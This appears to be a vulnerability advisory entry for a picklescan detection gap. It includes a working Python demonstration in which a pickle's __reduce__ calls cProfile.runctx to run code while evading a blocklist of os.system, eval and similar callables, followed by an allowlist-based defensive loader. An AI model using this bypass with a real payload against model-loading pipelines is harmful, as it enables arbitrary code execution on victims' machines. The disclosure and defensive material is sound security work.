Severity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
The malicious file is network-distributable (AV:N) and exploitation is straightforward once delivered (AC:L), although it depends on the target relying on picklescan's verdict before deserializing (AT:P). No authentication is required (PR:N), but the victim must load the file (UI:P, passive user interaction). Code execution inside the unpickling process gives high confidentiality and integrity impact on the vulnerable system (VC:H/VI:H); this vector rates availability impact as none (VA:N) and assigns no impact to subsequent systems (SC:N/SI:N/SA:N).
Primary rating from Vendor (VulnCheck).
CVSS Vector
Vendor: VulnCheck (same vector as listed under Severity by source)
Lifecycle Timeline
Description (CVE.org)
picklescan before 0.0.30 fails to detect cProfile.runctx function calls in pickle file reduce methods, allowing attackers to execute arbitrary code. Malicious pickle files bypass picklescan detection and execute remote code when loaded via pickle.load().
Analysis (AI)
picklescan versions before 0.0.30 can be bypassed by a pickle whose __reduce__ method returns cProfile.runctx as the callable: the scanner reports the file as clean, and the embedded statement is executed as soon as the file is deserialized with pickle.load(). The flaw undermines the core purpose of picklescan as a defensive gate for ML model artifacts. It was reported by VulnCheck, and a proof-of-concept is published in the GitHub Security Advisory. No weaponized in-the-wild exploitation had been identified at the time of analysis.
Technical Context (AI)
picklescan is a Python library (cpe:2.3:a:picklescan:picklescan) that inspects pickle files, particularly those embedded in PyTorch model artifacts, for opcodes and imported callables that would execute code on deserialization. The vulnerability is a CWE-502 (Deserialization of Untrusted Data) detection gap: picklescan flags GLOBAL/STACK_GLOBAL references to a blocklist of known dangerous callables (os.system, subprocess.Popen, eval, exec, and similar) that a pickle can invoke through the REDUCE opcode emitted for __reduce__, but cProfile.runctx was missing from that list. Because cProfile.runctx(statement, globals, locals) passes its first argument straight to exec(), it works as a proxy for arbitrary code that the scanner never sees as dangerous. The general weakness is that a blocklist can only ever enumerate the proxies its maintainers know about; any standard-library function that reaches exec, eval or a subprocess is an equally valid stand-in.
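The bypass mechanism described above, as an added example that is not picklescan's own code or the advisory's PoC. It builds a pickle whose __reduce__ resolves to cProfile.runctx, disassembles it with pickletools to recover the referenced callables the way a scanner would, shows that an illustrative pre-0.0.30-style blocklist (an assumed subset, not picklescan's real list) misses it while a list that includes cProfile.runctx catches it, and finally loads the payload with plain pickle.loads to prove the statement runs. The embedded statement is deliberately harmless (it sets a flag on the sys module); the profiler report that runctx prints is swallowed.

```python
import cProfile
import io
import pickle
import pickletools
import sys

# Illustrative blocklists (assumption: not picklescan's actual tables).
LEGACY_BLOCKLIST = {
    ("os", "system"),
    ("subprocess", "Popen"),
    ("builtins", "eval"),
    ("builtins", "exec"),
}
PATCHED_BLOCKLIST = LEGACY_BLOCKLIST | {("cProfile", "runctx")}


class ProfilerProxy:
    """Pickles as a call to cProfile.runctx(statement, {}, {}), which exec()s the statement."""

    def __init__(self, statement):
        self.statement = statement

    def __reduce__(self):
        return (cProfile.runctx, (self.statement, {}, {}))


def build_payload(statement):
    """Constructed sample input: the bytes an attacker would ship as a 'model' file."""
    return pickle.dumps(ProfilerProxy(statement), protocol=4)


def referenced_globals(data):
    """Collect (module, name) pairs from GLOBAL/STACK_GLOBAL opcodes without executing anything."""
    found = set()
    strings = []  # recent string pushes; STACK_GLOBAL consumes the last two (module, name)
    for op, arg, _pos in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":  # protocol <= 3 form: "module name"
            module, name = arg.split(" ", 1)
            found.add((module, name))
        elif op.name == "STACK_GLOBAL":
            name = strings.pop()
            module = strings.pop()
            found.add((module, name))
    return found


def scan(data, blocklist):
    """Blocked callables present in the file; an empty set is a 'clean' verdict (the bypass)."""
    return referenced_globals(data) & blocklist


def demonstrate_execution():
    """Load the payload with stock pickle.loads; returns True iff the statement ran."""
    sys.picklescan_demo_hit = False
    payload = build_payload("import sys; sys.picklescan_demo_hit = True")
    saved_stdout = sys.stdout
    sys.stdout = io.StringIO()  # runctx prints a profiler table to stdout; discard it
    try:
        pickle.loads(payload)  # cProfile.runctx -> exec(statement)
    finally:
        sys.stdout = saved_stdout
    return sys.picklescan_demo_hit


if __name__ == "__main__":
    payload = build_payload("import sys; sys.picklescan_demo_hit = True")
    print("callables referenced:", referenced_globals(payload))
    print("legacy blocklist flags:", scan(payload, LEGACY_BLOCKLIST) or "nothing (bypass)")
    print("patched blocklist flags:", scan(payload, PATCHED_BLOCKLIST))
    print("statement executed on pickle.loads:", demonstrate_execution())
```

The scanner logic here is a static opcode walk: it never calls find_class or REDUCE, which is the only safe way to inspect an untrusted pickle. Note that the same walk would report a clean file for any other stdlib callable that reaches exec() unless that callable is also on the list.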
Remediation (AI)
Vendor-released patch: upgrade picklescan to 0.0.30 or later (pip install --upgrade 'picklescan>=0.0.30'); the fix commit is https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b and is documented in the GHSA at https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9w88-8rmg-7g2p. Where an immediate upgrade is not possible: do not call pickle.load() on files from untrusted sources regardless of picklescan's verdict; prefer model formats that avoid pickle entirely, such as Safetensors (at the cost of not supporting arbitrary Python objects); if pickle must be used, deserialize through a pickle.Unpickler whose find_class() resolves only an explicit allowlist of modules and names, which rejects cProfile.runctx and every other unlisted proxy by default; and isolate model loading in a container or process with no network access and no filesystem write privileges so that an executed payload has minimal blast radius. Treat picklescan's output as advisory only until it is upgraded, and re-scan or audit any pickle files that were accepted on the strength of an unpatched scanner's verdict.
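The allowlisting loader recommended above, as an added example (not picklescan's code and not the project's API). It overrides pickle.Unpickler.find_class so that only an assumed allowlist of (module, name) pairs can be resolved; because STACK_GLOBAL triggers find_class before REDUCE runs, a cProfile.runctx payload is refused before any statement executes. The malicious sample is rebuilt here with the same harmless statement so the block runs stand-alone; the allowlist contents are an assumption to be tailored to the artifact format actually loaded.

```python
import cProfile
import io
import pickle
from collections import OrderedDict

# Assumed allowlist: the only callables a plain weights-dict checkpoint needs.
# Anything not listed (cProfile.runctx, os.system, ...) is refused by default.
ALLOWED_GLOBALS = {
    ("collections", "OrderedDict"),
}


class AllowlistUnpickler(pickle.Unpickler):
    """Deny-by-default unpickler: resolves globals only from ALLOWED_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data):
    return AllowlistUnpickler(io.BytesIO(data)).load()


def try_load(data):
    """Return ('ok', obj) when the file deserialized, ('refused', reason) when rejected."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("refused", str(exc))


class ProfilerProxy:
    """Same construction as the bypass: __reduce__ points at cProfile.runctx."""

    def __init__(self, statement):
        self.statement = statement

    def __reduce__(self):
        return (cProfile.runctx, (self.statement, {}, {}))


def build_payload(statement):
    """Constructed sample input standing in for an attacker-supplied model file."""
    return pickle.dumps(ProfilerProxy(statement), protocol=4)


def demo():
    """Outcome for a benign checkpoint-like dict versus the runctx payload."""
    benign = pickle.dumps(
        {"weights": [0.1, 0.2, 0.3], "meta": OrderedDict(epoch=3)}, protocol=4
    )
    malicious = build_payload("import sys; sys.picklescan_demo_hit = True")
    return try_load(benign)[0], try_load(malicious)[0]


if __name__ == "__main__":
    benign_result, malicious_result = demo()
    print("benign checkpoint:", benign_result)
    print("cProfile.runctx payload:", malicious_result)
```

The design choice is the inverse of a scanner blocklist: instead of enumerating dangerous callables, the loader enumerates the handful it needs and lets the unpickler fail closed on everything else. Keep the allowlist minimal and review every addition, since any allowed callable becomes reachable with attacker-chosen arguments.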
External POC / Exploit Code
EUVD-2025-210294
GHSA-fcqg-3mwf-cfcf